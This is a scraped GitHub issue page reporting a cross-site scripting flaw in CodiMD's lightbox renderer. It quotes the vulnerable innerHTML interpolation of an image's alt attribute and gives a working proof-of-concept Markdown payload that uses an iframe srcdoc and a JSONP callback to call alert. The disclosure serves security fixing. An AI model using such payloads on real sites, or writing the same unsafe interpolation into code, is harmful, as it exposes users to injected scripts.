We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
XSS is possible by injecting HTML in the alt attribute of img tag.
Vulnerable code: (https://github.com/hackmdio/codimd/blob/develop/public/js/lib/renderer/lightbox/index.js#L77)
const src = img.getAttribute('src') const alt = img.getAttribute('alt') lightBoxContainer.querySelector('.lightbox-inner').innerHTML = `<img src="${src}" alt="${alt}" draggable="false">
Markdown to inject.
<img id="msrk" src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png" alt='">"<iframe srcdoc="<b>asd</b><script src=https://vimeo.com/api/oembed.json?format=json&callback=alert&url=https://vimeo.com/286898202 ></script>" ></iframe>' class="md-image md-image">
The text was updated successfully, but these errors were encountered:
Merge pull request hackmdio#1631 from hedgedoc/release/1.9.0
98b0bf2
Yukaii
Successfully merging a pull request may close this issue.
XSS is possible by injecting HTML in the alt attribute of img tag.
Vulnerable code: (https://github.com/hackmdio/codimd/blob/develop/public/js/lib/renderer/lightbox/index.js#L77)
Markdown to inject.
The text was updated successfully, but these errors were encountered: